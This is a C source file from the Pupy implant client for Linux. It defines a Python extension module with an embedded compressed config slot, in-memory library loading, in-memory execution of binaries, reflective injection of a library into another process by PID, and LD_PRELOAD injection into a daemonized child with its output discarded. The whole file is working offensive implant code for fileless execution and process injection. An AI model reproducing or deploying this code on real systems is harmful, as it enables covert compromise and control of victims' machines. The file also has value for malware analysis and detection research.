pupy/client/sources-linux/pupy.c

325 lines
8.4 KiB
C

/*
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
*/
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include "debug.h"
#include "Python-dynload.h"
#include "daemonize.h"
#include <arpa/inet.h>
#include "tmplibrary.h"
#include <sys/mman.h>
#ifdef Linux
#include <sys/prctl.h>
#include "memfd.h"
int linux_inject_main(int argc, char **argv);
#endif
#include "library.c"
#include "revision.h"
static const char module_doc[] = "Builtins utilities for pupy";
static const char pupy_config[65536]="####---PUPY_CONFIG_COMES_HERE---####\n";
static PyObject *ExecError;
#include "lzmaunpack.c"
static PyObject *Py_get_modules(PyObject *self, PyObject *args)
{
static PyObject *modules = NULL;
if (!modules) {
modules = PyObject_lzmaunpack(
library_c_start,
library_c_size
);
munmap((char *) library_c_start,
library_c_size);
Py_XINCREF(modules);
}
return modules;
}
static PyObject *
Py_get_pupy_config(PyObject *self, PyObject *args)
{
static PyObject *config = NULL;
if (!config) {
unsigned int pupy_lzma_length = 0x0;
memcpy(&pupy_lzma_length, pupy_config, sizeof(unsigned int));
ssize_t compressed_size = ntohl(pupy_lzma_length);
config = PyObject_lzmaunpack(pupy_config+sizeof(int), compressed_size);
Py_XINCREF(config);
}
return config;
}
static PyObject *Py_get_arch(PyObject *self, PyObject *args)
{
#ifdef __x86_64__
return Py_BuildValue("s", "x64");
#elif __i386__
return Py_BuildValue("s", "x86");
#else
return Py_BuildValue("s", "unknown");
#endif
}
static PyObject *Py_ld_preload_inject_dll(PyObject *self, PyObject *args)
{
const char *lpCmdBuffer;
const char *lpDllBuffer;
uint32_t dwDllLenght;
PyObject* py_HookExit;
if (!PyArg_ParseTuple(args, "zs#O", &lpCmdBuffer, &lpDllBuffer, &dwDllLenght, &py_HookExit))
return NULL;
char ldobject[PATH_MAX] = {};
int cleanup_workaround = 0;
int cleanup = 1;
int fd = drop_library(ldobject, PATH_MAX, lpDllBuffer, dwDllLenght);
if (fd < 0) {
dprint("Couldn't drop library: %m\n");
return NULL;
}
#ifdef Linux
if (is_memfd_path(ldobject)) {
char buf2[PATH_MAX];
strncpy(buf2, ldobject, sizeof(buf2));
snprintf(ldobject, sizeof(ldobject), "/proc/%d/fd/%d", getpid(), fd);
cleanup_workaround = 1;
cleanup = 0;
}
#endif
char cmdline[PATH_MAX*2] = {};
snprintf(
cmdline, sizeof(cmdline), "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null",
ldobject,
PyObject_IsTrue(py_HookExit),
cleanup,
lpCmdBuffer
);
dprint("Program to execute in child context: %s\n", cmdline);
#ifdef Linux
prctl(4, 1, 0, 0, 0);
#endif
pid_t pid = daemonize(0, NULL, NULL, false);
if (pid == 0) {
/* Daemonized context */
dprint("Daemonization complete - client\n");
execl("/bin/sh", "/bin/sh", "-c", cmdline, NULL);
unlink(ldobject);
exit(255);
}
dprint("Daemonization complete - server\n");
if (cleanup_workaround) {
sleep(2);
close(fd);
}
#ifdef Linux
prctl(3, 0, 0, 0, 0);
#endif
if (pid == -1) {
dprint("Couldn\'t daemonize: %m\n");
unlink(ldobject);
return PyInt_FromLong(-1);
}
return PyInt_FromLong(pid);
}
#ifdef Linux
static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
{
uint32_t dwPid;
const char *lpDllBuffer;
uint32_t dwDllLenght;
if (!PyArg_ParseTuple(args, "Is#", &dwPid, &lpDllBuffer, &dwDllLenght))
return NULL;
dprint("Injection requested. PID: %d\n", dwPid);
char buf[PATH_MAX]={};
int fd = drop_library(buf, PATH_MAX, lpDllBuffer, dwDllLenght);
if (!fd) {
dprint("Couldn't drop library: %m\n");
return NULL;
}
if (is_memfd_path(buf)) {
char buf2[PATH_MAX];
strncpy(buf2, buf, sizeof(buf2));
snprintf(buf, sizeof(buf), "/proc/%d/fd/%d", getpid(), fd);
}
char pid[20] = {};
snprintf(pid, sizeof(pid), "%d", dwPid);
char *linux_inject_argv[] = {
"linux-inject", "-p", pid, buf, NULL
};
dprint("Injecting %s to %d\n", pid, buf);
prctl(4, 1, 0, 0, 0);
pid_t injpid = fork();
if (injpid == -1) {
dprint("Couldn't fork\n");
close(fd);
unlink(buf);
return PyBool_FromLong(1);
}
int status;
if (injpid == 0) {
int r = linux_inject_main(4, linux_inject_argv);
exit(r);
} else {
waitpid(injpid, &status, 0);
}
prctl(3, 0, 0, 0, 0);
dprint("Injection code: %d\n", status);
unlink(buf);
/* close(fd); */
if (WEXITSTATUS(status) == 0) {
dprint("Injection successful\n");
return PyBool_FromLong(1);
} else {
dprint("Injection failed\n");
return PyBool_FromLong(0);
}
}
#endif
static PyObject *Py_load_dll(PyObject *self, PyObject *args)
{
const char *lpDllBuffer;
uint32_t dwDllLenght;
const char *dllname;
if (!PyArg_ParseTuple(args, "ss#", &dllname, &lpDllBuffer, &dwDllLenght))
return NULL;
printf("Py_load_dll(%s)\n", dllname);
return PyLong_FromVoidPtr(memdlopen(dllname, lpDllBuffer, dwDllLenght));
}
static PyObject *Py_mexec(PyObject *self, PyObject *args)
{
const char *buffer = NULL;
size_t buffer_size = 0;
PyObject *argv_obj = NULL;
PyObject *redirected_obj = NULL;
PyObject *detach_obj = NULL;
if (!PyArg_ParseTuple(args, "s#OOO", &buffer, &buffer_size, &argv_obj, &redirected_obj, &detach_obj))
return NULL;
Py_ssize_t argc = PySequence_Length(argv_obj);
if (argc < 1) {
PyErr_SetString(ExecError, "Args not passed");
return NULL;
}
bool redirected = PyObject_IsTrue(redirected_obj);
bool detach = PyObject_IsTrue(detach_obj);
char **argv = (char **) malloc(sizeof(char*) * (argc + 1));
if (!argv) {
PyErr_SetString(ExecError, "Too many args");
return NULL;
}
int i;
for (i=0; i<argc; i++) {
PyObject *arg = NULL;
arg = PySequence_GetItem(argv_obj, i);
if (arg)
argv[i] = PyString_AsString(arg);
}
argv[argc] = NULL;
int stdior[3] = { -1, -1, -1 };
pid_t pid = memexec(buffer, buffer_size, (const char **) argv, stdior, redirected, detach);
if (pid < 0) {
PyErr_SetString(ExecError, "Can't execute");
return NULL;
}
PyObject * p_stdin = Py_None;
PyObject * p_stdout = Py_None;
PyObject * p_stderr = Py_None;
if (redirected) {
p_stdin = PyFile_FromFile(fdopen(stdior[0], "w"), "mexec:stdin", "a", fclose);
p_stdout = PyFile_FromFile(fdopen(stdior[1], "r"), "mexec:stdout", "r", fclose);
p_stderr = PyFile_FromFile(fdopen(stdior[2], "r"), "mexec:stderr", "r", fclose);
PyFile_SetBufSize(p_stdin, 0);
PyFile_SetBufSize(p_stdout, 0);
PyFile_SetBufSize(p_stderr, 0);
}
return Py_BuildValue("i(OOO)", pid, p_stdin, p_stdout, p_stderr);
}
static PyMethodDef methods[] = {
{ "get_pupy_config", Py_get_pupy_config, METH_NOARGS, "get_pupy_config() -> string" },
{ "get_arch", Py_get_arch, METH_NOARGS, "get current pupy architecture (x86 or x64)" },
{ "get_modules", Py_get_modules, METH_NOARGS, "get pupy library" },
#ifdef Linux
{ "reflective_inject_dll", Py_reflective_inject_dll, METH_VARARGS|METH_KEYWORDS, "reflective_inject_dll(pid, dll_buffer)\nreflectively inject a dll into a process. raise an Exception on failure" },
#endif
{ "load_dll", Py_load_dll, METH_VARARGS, "load_dll(dllname, raw_dll) -> ptr" },
{ "mexec", Py_mexec, METH_VARARGS, "mexec(data, argv, redirected_stdio, detach) -> (pid, (in, out, err))" },
{ "ld_preload_inject_dll", Py_ld_preload_inject_dll, METH_VARARGS, "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" },
{ NULL, NULL }, /* Sentinel */
};
DL_EXPORT(void)
initpupy(void)
{
PyObject *pupy = Py_InitModule3("pupy", methods, (char *) module_doc);
if (!pupy) {
return;
}
PyModule_AddStringConstant(pupy, "revision", GIT_REVISION_HEAD);
ExecError = PyErr_NewException("pupy.error", NULL, NULL);
Py_INCREF(ExecError);
PyModule_AddObject(pupy, "error", ExecError);
}